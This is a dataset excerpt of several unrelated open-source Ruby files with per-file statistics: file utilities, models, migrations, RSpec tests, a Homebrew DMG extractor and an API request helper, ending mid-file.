hexsha
stringlengths
40
40
size
int64
2
1.01M
content
stringlengths
2
1.01M
avg_line_length
float64
1.5
100
max_line_length
int64
2
1k
alphanum_fraction
float64
0.25
1
28713525b6abe5e6ad9c87f8c83cea11062be2e1
14,336
# frozen_string_literal: true require 'pathname' require 'fileutils' module Dry class CLI module Utils # Files utilities # # @since 0.3.1 module Files # rubocop:disable Metrics/ModuleLength # Creates an empty file for the given path. # All the intermediate directories are created. # If the path already exists, it doesn't change the contents # # @param path [String,Pathname] the path to file # # @since 0.3.1 def self.touch(path) mkdir_p(path) FileUtils.touch(path) end # Creates a new file or rewrites the contents # of an existing file for the given path and content # All the intermediate directories are created. # # @param path [String,Pathname] the path to file # @param content [String, Array<String>] the content to write # # @since 0.3.1 def self.write(path, *content) mkdir_p(path) open(path, ::File::CREAT | ::File::WRONLY | ::File::TRUNC, *content) # rubocop:disable LineLength, Security/Open - this isn't a call to `::Kernel.open`, but to `self.open` end # Copies source into destination. # All the intermediate directories are created. # If the destination already exists, it overrides the contents. # # @param source [String,Pathname] the path to the source file # @param destination [String,Pathname] the path to the destination file # # @since 0.3.1 def self.cp(source, destination) mkdir_p(destination) FileUtils.cp(source, destination) end # Creates a directory for the given path. # It assumes that all the tokens in `path` are meant to be a directory. # All the intermediate directories are created. # # @param path [String,Pathname] the path to directory # # @since 0.3.1 # # @see .mkdir_p # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.mkdir("path/to/directory") # # => creates the `path/to/directory` directory # # # WRONG this isn't probably what you want, check `.mkdir_p` # Dry::CLI::Utils::Files.mkdir("path/to/file.rb") # # => creates the `path/to/file.rb` directory def self.mkdir(path) FileUtils.mkdir_p(path) end # Creates a directory for the given path. # It assumes that all the tokens, but the last, in `path` are meant to be # a directory, whereas the last is meant to be a file. # All the intermediate directories are created. # # @param path [String,Pathname] the path to directory # # @since 0.3.1 # # @see .mkdir # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.mkdir_p("path/to/file.rb") # # => creates the `path/to` directory, but NOT `file.rb` # # # WRONG it doesn't create the last directory, check `.mkdir` # Dry::CLI::Utils::Files.mkdir_p("path/to/directory") # # => creates the `path/to` directory def self.mkdir_p(path) Pathname.new(path).dirname.mkpath end # Deletes given path (file). # # @param path [String,Pathname] the path to file # # @raise [Errno::ENOENT] if the path doesn't exist # # @since 0.3.1 def self.delete(path) FileUtils.rm(path) end # Deletes given path (directory). # # @param path [String,Pathname] the path to file # # @raise [Errno::ENOENT] if the path doesn't exist # # @since 0.3.1 def self.delete_directory(path) FileUtils.remove_entry_secure(path) end # Adds a new line at the top of the file # # @param path [String,Pathname] the path to file # @param line [String] the line to add # # @raise [Errno::ENOENT] if the path doesn't exist # # @see .append # # @since 0.3.1 def self.unshift(path, line) content = ::File.readlines(path) content.unshift("#{line}\n") write(path, content) end # Adds a new line at the bottom of the file # # @param path [String,Pathname] the path to file # @param contents [String] the contents to add # # @raise [Errno::ENOENT] if the path doesn't exist # # @see .unshift # # @since 0.3.1 def self.append(path, contents) mkdir_p(path) content = ::File.readlines(path) content << "\n" unless content.last.end_with?("\n") content << "#{contents}\n" write(path, content) end # Replace first line in `path` that contains `target` with `replacement`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param replacement [String] the replacement # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .replace_last_line # # @since 0.3.1 def self.replace_first_line(path, target, replacement) content = ::File.readlines(path) content[index(content, path, target)] = "#{replacement}\n" write(path, content) end # Replace last line in `path` that contains `target` with `replacement`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param replacement [String] the replacement # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .replace_first_line # # @since 0.3.1 def self.replace_last_line(path, target, replacement) content = ::File.readlines(path) content[-index(content.reverse, path, target) - 1] = "#{replacement}\n" write(path, content) end # Inject `contents` in `path` before `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_after # @see .inject_line_before_last # @see .inject_line_after_last # # @since 0.3.1 def self.inject_line_before(path, target, contents) _inject_line_before(path, target, contents, method(:index)) end # Inject `contents` in `path` after last `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_after # @see .inject_line_after_last # # @since 1.3.0 def self.inject_line_before_last(path, target, contents) _inject_line_before(path, target, contents, method(:rindex)) end # Inject `contents` in `path` after `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_before_last # @see .inject_line_after_last # # @since 0.3.1 def self.inject_line_after(path, target, contents) _inject_line_after(path, target, contents, method(:index)) end # Inject `contents` in `path` after last `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to replace # @param contents [String] the contents to inject # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @see .inject_line_before # @see .inject_line_after # @see .inject_line_before_last # @see .inject_line_after_last # # @since 1.3.0 def self.inject_line_after_last(path, target, contents) _inject_line_after(path, target, contents, method(:rindex)) end # Removes line from `path`, matching `target`. # # @param path [String,Pathname] the path to file # @param target [String,Regexp] the target to remove # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @since 0.3.1 def self.remove_line(path, target) content = ::File.readlines(path) i = index(content, path, target) content.delete_at(i) write(path, content) end # Removes `target` block from `path` # # @param path [String,Pathname] the path to file # @param target [String] the target block to remove # # @raise [Errno::ENOENT] if the path doesn't exist # @raise [ArgumentError] if `target` cannot be found in `path` # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # puts File.read("app.rb") # # # class App # # configure do # # root __dir__ # # end # # end # # Dry::CLI::Utils::Files.remove_block("app.rb", "configure") # # puts File.read("app.rb") # # # class App # # end def self.remove_block(path, target) content = ::File.readlines(path) starting = index(content, path, target) line = content[starting] size = line[/\A[[:space:]]*/].bytesize closing = (' ' * size) + (target.match?(/{/) ? '}' : 'end') ending = starting + index(content[starting..-1], path, closing) content.slice!(starting..ending) write(path, content) remove_block(path, target) if match?(content, target) end # Checks if `path` exist # # @param path [String,Pathname] the path to file # # @return [TrueClass,FalseClass] the result of the check # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.exist?(__FILE__) # => true # Dry::CLI::Utils::Files.exist?(__dir__) # => true # # Dry::CLI::Utils::Files.exist?("missing_file") # => false def self.exist?(path) File.exist?(path) end # Checks if `path` is a directory # # @param path [String,Pathname] the path to directory # # @return [TrueClass,FalseClass] the result of the check # # @since 0.3.1 # # @example # require "dry/cli/utils/files" # # Dry::CLI::Utils::Files.directory?(__dir__) # => true # Dry::CLI::Utils::Files.directory?(__FILE__) # => false # # Dry::CLI::Utils::Files.directory?("missing_directory") # => false def self.directory?(path) File.directory?(path) end # private # @since 0.3.1 # @api private def self.match?(content, target) !line_number(content, target).nil? end private_class_method :match? # @since 0.3.1 # @api private def self.open(path, mode, *content) ::File.open(path, mode) do |file| file.write(Array(content).flatten.join) end end private_class_method :open # @since 0.3.1 # @api private def self.index(content, path, target) line_number(content, target) || raise(ArgumentError, "Cannot find `#{target}' inside `#{path}'.") end private_class_method :index # @since 1.3.0 # @api private def self.rindex(content, path, target) line_number(content, target, finder: content.method(:rindex)) || raise(ArgumentError, "Cannot find `#{target}' inside `#{path}'.") end private_class_method :rindex # @since 1.3.0 # @api private def self._inject_line_before(path, target, contents, finder) content = ::File.readlines(path) i = finder.call(content, path, target) content.insert(i, "#{contents}\n") write(path, content) end private_class_method :_inject_line_before # @since 1.3.0 # @api private def self._inject_line_after(path, target, contents, finder) content = ::File.readlines(path) i = finder.call(content, path, target) content.insert(i + 1, "#{contents}\n") write(path, content) end private_class_method :_inject_line_after # @since 0.3.1 # @api private def self.line_number(content, target, finder: content.method(:index)) finder.call do |l| case target when ::String l.include?(target) when Regexp l =~ target end end end private_class_method :line_number end end end end
32.288288
181
0.547921
bbada9092345d7a7343d453ca1a7374b0eb617f6
160
module AutotestNotification #:nodoc: module VERSION #:nodoc: MAJOR = 1 MINOR = 6 TINY = 0 STRING = [MAJOR, MINOR, TINY].join('.') end end
16
43
0.6
b96894a3aef2dd4a2ab97539ef393f899808a155
3,173
require 'netaddr' module VCAP::CloudController class SecurityGroup < Sequel::Model SECURITY_GROUP_NAME_REGEX = /\A[[:alnum:][:punct:][:print:]]+\Z/ MAX_RULES_CHAR_LENGTH = 2**24 - 1 plugin :serialization import_attributes :name, :rules, :running_default, :staging_default, :space_guids export_attributes :name, :rules, :running_default, :staging_default serialize_attributes :json, :rules many_to_many :spaces many_to_many :staging_spaces, class: 'VCAP::CloudController::Space', join_table: 'staging_security_groups_spaces', right_key: :staging_space_id, left_key: :staging_security_group_id add_association_dependencies spaces: :nullify, staging_spaces: :nullify def validate validates_presence :name validates_unique :name validates_format SECURITY_GROUP_NAME_REGEX, :name validate_rules_length validate_rules end def self.user_visibility_filter(user) managed_organizations_spaces_dataset = Space.where(id: user.managed_organizations_dataset. join(:spaces, spaces__organization_id: :organizations__id). select(:spaces__id)) Sequel.or([ [:spaces, user.spaces_dataset], [:spaces, user.managed_spaces_dataset], [:spaces, user.audited_spaces_dataset], [:spaces, managed_organizations_spaces_dataset], [:staging_spaces, user.spaces_dataset], [:staging_spaces, user.managed_spaces_dataset], [:staging_spaces, user.audited_spaces_dataset], [:staging_spaces, managed_organizations_spaces_dataset], [:running_default, true], [:staging_default, true], ]) end private def validate_rules_length return if self[:rules].nil? # use this instead of validates_max_length b/c we care about the serialized # value that is happening due to our use of the serialize_attributes on rules column if self[:rules].length > MAX_RULES_CHAR_LENGTH errors.add(:rules, "length must not exceed #{MAX_RULES_CHAR_LENGTH} characters") end end def validate_rules return true unless rules unless rules.is_a?(Array) && rules.all? { |r| r.is_a?(Hash) } errors.add(:rules, "value must be an array of hashes. rules: '#{rules}'") return false end rules.each_with_index do |rule, index| protocol = rule['protocol'] validation_errors = case protocol when 'tcp', 'udp' CloudController::TransportRuleValidator.validate(rule) when 'icmp' CloudController::ICMPRuleValidator.validate(rule) when 'all' CloudController::RuleValidator.validate(rule) else ['contains an unsupported protocol'] end validation_errors.each do |error_text| errors.add(:rules, "rule number #{index + 1} #{error_text}") end errors.empty? end end end end
33.755319
90
0.630003
e864632d8c52004c615e67c86092206970c6999b
299
class CreateVolunteers < ActiveRecord::Migration[5.0] def change create_table :volunteers do |t| t.string :name t.string :phone t.string :email t.string :address t.string :city t.string :state t.string :zip t.timestamps end end end
18.6875
53
0.602007
0890fbda59b419c192f2f8984528e27f23f986bb
4,396
require 'spec_helper' require 'oily_png' describe SnapshotComparer do describe '#compare!' do let(:snapshot_after) { build(:snapshot) } let(:snapshot_before) { build(:snapshot) } let(:snapshot_comparer) do SnapshotComparer.new(snapshot_after, snapshot_before) end subject { snapshot_comparer.compare! } context 'with identical snapshots' do before do snapshot_comparer.stubs(:to_chunky_png) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::WHITE)) end it 'should report no difference' do subject[:diff_in_percent].should == 0.0 end it 'should report no diff image' do subject[:diff_image].should be_nil end it 'should report no cluster differences' do subject[:diff_clusters].should be_empty end end context 'with entirely different snapshots' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::WHITE)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end it 'should report a diff image' do subject[:diff_image].should_not be_nil end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot is half as tall as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 1, ChunkyPNG::Color::BLACK)) end it 'should report a 50% difference' do subject[:diff_in_percent].should == 50.0 end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot is twice as tall as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 4, ChunkyPNG::Color::BLACK)) end it 'should report a 50% difference' do subject[:diff_in_percent].should == 50.0 end it 'returns an image of the correct height' do subject[:diff_image].height.should == 4 end it 'should report one cluster difference' do subject[:diff_clusters].count.should == 1 end end context 'when the after snapshot half as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(1, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end context 'when the before snapshot is twice as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(4, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end context 'when the after snapshot is twice as wide as the before snapshot' do before do snapshot_comparer.stubs(:to_chunky_png).with(snapshot_after) .returns(ChunkyPNG::Image.new(4, 2, ChunkyPNG::Color::BLACK)) snapshot_comparer.stubs(:to_chunky_png).with(snapshot_before) .returns(ChunkyPNG::Image.new(2, 2, ChunkyPNG::Color::BLACK)) end it 'should report a 100% difference' do subject[:diff_in_percent].should == 100.0 end end end end
33.557252
81
0.660146
ac06cdc80f6e980e46958401f46c7afdb39884fa
1,335
class NewRelic::MetricParser::View < NewRelic::MetricParser def is_view?; true; end def is_render? segments.last == "Rendering" end def is_compiler? segments.last == "Compile" end def pie_chart_label case segments.last when "Rendering" "#{file_name(segments[-2])} Template" when "Partial" "#{file_name(segments[-2])} Partial" when ".rhtml Processing" "ERB compilation" else segments[1..-1] end end def template_label case segments.last when "Rendering" "#{file_name(segments[1..-2].join(NewRelic::MetricParser::SEPARATOR))} Template" when "Partial" "#{file_name(segments[1..-2].join(NewRelic::MetricParser::SEPARATOR))} Partial" when ".rhtml Processing" "ERB compilation" else segments[1..-1].join("/") end end def short_name segments[1..-2].join(NewRelic::MetricParser::SEPARATOR) end def controller_name template_label end def action_name # Strip the extension segments[-2].gsub(/\..*$/, "") end def developer_name template_label end def url '/' + file_name(segments[1..-2].join('/')) end private def file_name(path) label = path.gsub /\.html\.rhtml/, '.rhtml' label = segments[1] if label.empty? label end end
21.532258
88
0.619476
f7da90af5eb8bd5aaf22dbc17e25ff9c7e461d9f
2,297
class Cask::Container::Dmg < Cask::Container::Base def self.me?(criteria) criteria.imageinfo != '' end attr_reader :mounts def initialize(*args) super(*args) @mounts = [] end def extract mount! assert_mounts_found @mounts.each do |mount| @command.run('/usr/bin/ditto', # todo # per https://github.com/caskroom/homebrew-cask/issues/6382, ditto # complains to stderr about unreadable .Trashes directories, so all # stderr output is silenced for now. But better solutions would be # - use the --bom option to ditto to selectively avoid certain files # - .Trashes # - symlinks to Applications # - or support some type of text filter to be passed to # :print_stderr instead of true/false :print_stderr => false, :args => ['--', mount, @cask.destination_path]) end ensure eject! end def mount! plist = @command.run('/usr/bin/hdiutil', # realpath is a failsafe against unusual filenames :args => %w[mount -plist -nobrowse -readonly -noidme -mountrandom /tmp] + [Pathname.new(@path).realpath], :input => %w[y] ).plist @mounts = mounts_from_plist(plist) end def mounts_from_plist(plist) return [] unless plist.respond_to?(:fetch) plist.fetch('system-entities', []).map do |entity| entity['mount-point'] end.compact end def assert_mounts_found if @mounts.empty? raise CaskError.new %Q{No mounts found in '#{@path}'; perhaps it is a bad DMG?} end end def eject! @mounts.each do |mount| # realpath is a failsafe against unusual filenames mountpath = Pathname.new(mount).realpath next unless mountpath.exist? @command.run('/usr/sbin/diskutil', :args => ['eject', mountpath], :print_stderr => false) next unless mountpath.exist? sleep 1 @command.run('/usr/sbin/diskutil', :args => ['eject', mountpath], :print_stderr => false) next unless mountpath.exist? raise CaskError.new "Failed to eject #{mountpath}" end end end
31.465753
111
0.581628
7a4ff5d3783b961ce743f64e449497b77b61e992
170
class AddUsernameToUsers < ActiveRecord::Migration[5.1] def change add_column :users, :username, :string add_index :users, :username, :unique => true end end
24.285714
55
0.717647
edcf552ec41a4267bdb71ecacaed9ed993e1bab7
1,461
# frozen_string_literal: true require "#{ROOT_DIR}/lib/custom_facts/version" require "#{ROOT_DIR}/lib/custom_facts/core/logging" require "#{ROOT_DIR}/lib/custom_facts/core/legacy_facter" require "#{ROOT_DIR}/lib/custom_facts/util/fact" require "#{ROOT_DIR}/lib/custom_facts/util/collection" require "#{ROOT_DIR}/lib/custom_facts/util/fact" require "#{ROOT_DIR}/lib/custom_facts/util/loader" require "#{ROOT_DIR}/lib/custom_facts/core/execution/base" require "#{ROOT_DIR}/lib/custom_facts/core/execution/windows" require "#{ROOT_DIR}/lib/custom_facts/core/execution/posix" require "#{ROOT_DIR}/lib/custom_facts/util/values" require "#{ROOT_DIR}/lib/custom_facts/util/confine" require "#{ROOT_DIR}/lib/custom_facts/util/config" require "#{ROOT_DIR}/lib/custom_facts/util/normalization" require "#{ROOT_DIR}/lib/custom_facts/core/execution" require "#{ROOT_DIR}/lib/custom_facts/core/resolvable" require "#{ROOT_DIR}/lib/custom_facts/core/suitable" require "#{ROOT_DIR}/lib/custom_facts/util/resolution" require "#{ROOT_DIR}/lib/custom_facts/core/directed_graph" require "#{ROOT_DIR}/lib/custom_facts/core/resolvable" require "#{ROOT_DIR}/lib/custom_facts/core/aggregate" require "#{ROOT_DIR}/lib/custom_facts/util/composite_loader" require "#{ROOT_DIR}/lib/custom_facts/util/parser" require "#{ROOT_DIR}/lib/custom_facts/util/directory_loader" require "#{ROOT_DIR}/lib/custom_facts/util/nothing_loader" require "#{ROOT_DIR}/lib/custom_facts/util/nothing_loader"
50.37931
61
0.798768
7aa5801ddb271e69a76ec85fbd6d753807733f88
3,334
# Licensed to Elasticsearch B.V. under one or more contributor # license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright # ownership. Elasticsearch B.V. licenses this file to you under # the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # frozen_string_literal: true require 'net/https' require 'json' require 'elastic/enterprise-search/exceptions' require 'base64' module Elastic module EnterpriseSearch CLIENT_NAME = 'elastic-enteprise-search-ruby' CLIENT_VERSION = Elastic::EnterpriseSearch::VERSION # Module included in Elastic::Enterprise::Client for http requests. module Request def get(path, params = {}, headers = {}) request(:get, path, params, headers) end def post(path, params = {}, body = {}, headers = {}) request(:post, path, params, body, headers) end def put(path, params = {}, body = {}, headers = {}) request(:put, path, params, body, headers) end def delete(path, params = {}, headers = {}) request(:delete, path, params, headers) end # Construct and send a request to the API. def request(method, path, params = {}, body = {}, headers = {}) meta_headers = { authorization: decide_authorization(params), user_agent: request_user_agent } headers = if !headers.is_a?(Hash) meta_headers else headers.merge(meta_headers) end @transport.perform_request(method.to_s.upcase, path, params, body, headers) end def setup_authentication_header if instance_of? Elastic::EnterpriseSearch::Client basic_auth_header else case http_auth when Hash basic_auth_header when String "Bearer #{http_auth}" end end end def basic_auth_header credentials = Base64.strict_encode64("#{http_auth[:user]}:#{http_auth[:password]}") "Basic #{credentials}" end private def request_user_agent ua = "#{CLIENT_NAME}/#{CLIENT_VERSION}" meta = ["RUBY_VERSION: #{RUBY_VERSION}"] if RbConfig::CONFIG && RbConfig::CONFIG['host_os'] meta << "#{RbConfig::CONFIG['host_os'].split('_').first[/[a-z]+/i].downcase} " \ "#{RbConfig::CONFIG['target_cpu']}" end meta << "elastic-transport: #{Elastic::Transport::VERSION}" "#{ua} (#{meta.join('; ')})" end def decide_authorization(params) if params[:grant_type] == 'authorization_code' "Bearer #{params[:code]}" elsif params[:access_token] "Bearer #{params.delete(:access_token)}" else setup_authentication_header end end end end end
32.368932
102
0.629574
bba02a665e16ee38109dff6641a181de89063e11
183
class CreateUser < ActiveRecord::Migration def change create_table :users do |t| t.string :username t.string :email t.string :password_digest end end end
18.3
42
0.672131
1d4b780aa87c00b1f73e0109c807f96433199a63
809
class Dhcping < Formula desc "Perform a dhcp-request to check whether a dhcp-server is running" homepage "http://www.mavetju.org/unix/general.php" url "http://www.mavetju.org/download/dhcping-1.2.tar.gz" mirror "https://mirrors.kernel.org/debian/pool/main/d/dhcping/dhcping_1.2.orig.tar.gz" sha256 "32ef86959b0bdce4b33d4b2b216eee7148f7de7037ced81b2116210bc7d3646a" bottle do cellar :any sha256 "7741adb9bc166ee2450e521f7468e2b023632e737eb4da065848c5e87b6bd35a" => :yosemite sha256 "49206410d2fc5259798c2a76ee871df08c54772d1501d7ce1d29be652d600905" => :mavericks sha256 "4da8d1813dd16242c02ccea50549ac5eca0048475f9a6118b525677d6c72fda2" => :mountain_lion end def install system "./configure", "--prefix=#{prefix}", "--mandir=#{man}" system "make", "install" end end
40.45
95
0.771323
28a541a6c604abadb57fa101abcca79fe04c05ae
4,729
require "helper" module Neovim RSpec.describe LineRange do let(:client) { Support.persistent_client } let(:buffer) { client.current.buffer } let(:line_range) { LineRange.new(buffer) } before do buffer.set_lines(0, -1, true, ["1", "2", "3", "4"]) end describe "#each" do it "yields each line" do yielded = [] line_range.each { |line| yielded << line } expect(yielded).to eq(["1", "2", "3", "4"]) end it "yields a large number of lines" do lines = Array.new(6000, "x") buffer.set_lines(0, -1, true, lines) yielded = [] line_range.each { |line| yielded << line } expect(yielded).to eq(lines) end end describe "#to_a" do it "returns lines as an array" do expect(line_range.to_a).to eq(["1", "2", "3", "4"]) end it "returns a large number of lines as an array" do lines = Array.new(6000, "x") buffer.set_lines(0, -1, true, lines) expect(line_range.to_a).to eq(lines) end end describe "#==" do it "compares line contents" do client.command("new") buffer2 = client.current.buffer expect(buffer2.lines == buffer.lines).to eq(false) buffer2.set_lines(0, -1, true, ["1", "2", "3", "4"]) expect(buffer2.lines == buffer.lines).to eq(true) end end describe "#[]" do it "accepts a single index" do expect(line_range[1]).to eq("2") expect(line_range[-1]).to eq("4") expect(line_range[-2]).to eq("3") end it "accepts an index and length" do expect(line_range[0, 2]).to eq(["1", "2"]) expect(line_range[-2, 2]).to eq(["3", "4"]) expect(line_range[-2, 3]).to eq(["3", "4"]) expect do line_range[2, 3] end.to raise_error(/out of bounds/) end it "accepts a range" do expect(line_range[0..1]).to eq(["1", "2"]) expect(line_range[0...1]).to eq(["1"]) expect(line_range[0..-1]).to eq(["1", "2", "3", "4"]) expect(line_range[0..-2]).to eq(["1", "2", "3"]) expect(line_range[-3..-2]).to eq(["2", "3"]) expect(line_range[0..-5]).to eq([]) expect(line_range[0...-4]).to eq([]) expect(line_range[-2..-3]).to eq([]) expect do line_range[2..4] end.to raise_error(/out of bounds/) end end describe "#[]=" do it "accepts a single index" do expect(line_range[0] = "foo").to eq("foo") expect(line_range.to_a).to eq(["foo", "2", "3", "4"]) expect(line_range[-1] = "bar").to eq("bar") expect(line_range.to_a).to eq(["foo", "2", "3", "bar"]) expect do line_range[-5] = "foo" end.to raise_error(/out of bounds/) end it "accepts an index and length" do expect(line_range[0, 2] = ["foo"]).to eq(["foo"]) expect(line_range.to_a).to eq(["foo", "3", "4"]) expect(line_range[-2, 2] = ["bar"]).to eq(["bar"]) expect(line_range.to_a).to eq(["foo", "bar"]) expect(line_range[0, 2] = "baz").to eq("baz") expect(line_range.to_a).to eq(["baz"]) expect do line_range[0, 5] = "foo" end.to raise_error(/out of bounds/) end it "accepts a range" do expect(line_range[0..1] = ["foo"]).to eq(["foo"]) expect(line_range.to_a).to eq(["foo", "3", "4"]) expect(line_range[0...1] = ["bar"]).to eq(["bar"]) expect(line_range.to_a).to eq(["bar", "3", "4"]) expect(line_range[0..-2] = ["baz"]).to eq(["baz"]) expect(line_range.to_a).to eq(["baz", "4"]) expect(line_range[0...2] = "qux").to eq("qux") expect(line_range.to_a).to eq(["qux"]) end end describe "#replace" do it "replaces all lines" do line_range.replace(["4", "5"]) expect(line_range.to_a).to eq(["4", "5"]) end end describe "#delete" do it "deletes the line at the given index" do expect do line_range.delete(0) end.to change { line_range.to_a }.to(["2", "3", "4"]) expect do line_range.delete(-1) end.to change { line_range.to_a }.to(["2", "3"]) expect do line_range.delete(-2) end.to change { line_range.to_a }.to(["3"]) end it "returns the line deleted" do expect(line_range.delete(0)).to eq("1") expect(line_range.delete(-1)).to eq("4") end it "returns nil if provided a non-integer" do expect do expect(line_range.delete(:foo)).to eq(nil) end.not_to change { line_range.to_a } end end end end
28.14881
63
0.525904
d5c6820f0a9b5f880342f5bdd8e5aeb524d7eae7
8,645
# frozen_string_literal: true require 'rspec/core/sandbox' # We need a reporter for internal tests that's different from the reporter for # external tests otherwise the results will be mixed up. We don't care about # most reporting, but we do want to know if a test fails class RaiseOnFailuresReporter < RSpec::Core::NullReporter def self.example_failed(example) raise example.exception end end # We use an example group wrapper to prevent the state of internal tests # expanding into the global state # See: https://github.com/rspec/rspec-core/issues/2603 def describe_successfully(*args, &describe_body) example_group = RSpec.describe(*args, &describe_body) ran_successfully = example_group.run RaiseOnFailuresReporter expect(ran_successfully).to eq true example_group end RSpec.configure do |c| c.around do |ex| RSpec::Core::Sandbox.sandboxed do |config| # If there is an example-within-an-example, we want to make sure the inner example # does not get a reference to the outer example (the real spec) if it calls # something like `pending` config.before(:context) { RSpec.current_example = nil } config.color_mode = :off # Load airborne again to avoid "undefined method `match_expected_default?'" errors # that happen because a hook calls a method added via a custom RSpec setting # that is removed when the RSpec configuration is sandboxed. # If this needs to be changed (e.g., to load other libraries as well), see # this discussion for alternative solutions: # https://gitlab.com/gitlab-org/gitlab-foss/merge_requests/25223#note_143392053 load 'airborne.rb' ex.run end end end describe QA::Specs::Helpers::Quarantine do describe '.skip_or_run_quarantined_contexts' do context 'with no tag focused' do before do described_class.configure_rspec end it 'skips before hooks of quarantined contexts' do executed_hooks = [] group = describe_successfully('quarantine', :quarantine) do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:pending) expect(group.descendant_filtered_examples.first.execution_result.pending_message) .to eq('In quarantine') end it 'executes before hooks of non-quarantined contexts' do executed_hooks = [] group = describe_successfully do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [:before_all, :before] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:passed) end end context 'with :quarantine focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :quarantine end end it 'executes before hooks of quarantined contexts' do executed_hooks = [] group = describe_successfully('quarantine', :quarantine) do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [:before_all, :before] expect(group.descendant_filtered_examples.first.execution_result.status).to eq(:passed) end it 'skips before hooks of non-quarantined contexts' do executed_hooks = [] group = describe_successfully do before(:all) do executed_hooks << :before_all end before do executed_hooks << :before end example {} end expect(executed_hooks).to eq [] expect(group.descendant_filtered_examples.first).to be_nil end end end describe '.skip_or_run_quarantined_tests' do context 'with no tag focused' do before do described_class.configure_rspec end it 'skips quarantined tests' do group = describe_successfully do it('is pending', :quarantine) {} end expect(group.examples.first.execution_result.status).to eq(:pending) expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine') end it 'executes non-quarantined tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to eq(:passed) end context 'quarantine message' do shared_examples 'test with quarantine message' do |quarantine_tag| it 'outputs the quarantine message' do group = describe_successfully do it('is quarantined', quarantine: quarantine_tag) {} end expect(group.examples.first.execution_result.pending_message) .to eq('In quarantine : for a reason') end end it_behaves_like 'test with quarantine message', 'for a reason' it_behaves_like 'test with quarantine message', { issue: 'for a reason', environment: [:nightly, :staging] } end end context 'with :quarantine focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :quarantine end end it 'executes quarantined tests' do group = describe_successfully do it('passes', :quarantine) {} end expect(group.examples.first.execution_result.status).to eq(:passed) end it 'ignores non-quarantined tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end end context 'with a non-quarantine tag focused' do before do described_class.configure_rspec RSpec.configure do |c| c.filter_run :foo end end it 'ignores non-quarantined non-focused tests' do group = describe_successfully do example {} end expect(group.examples.first.execution_result.status).to be_nil end it 'executes non-quarantined focused tests' do group = describe_successfully do it('passes', :foo) {} end expect(group.examples.first.execution_result.status).to be(:passed) end it 'ignores quarantined tests' do group = describe_successfully do it('is 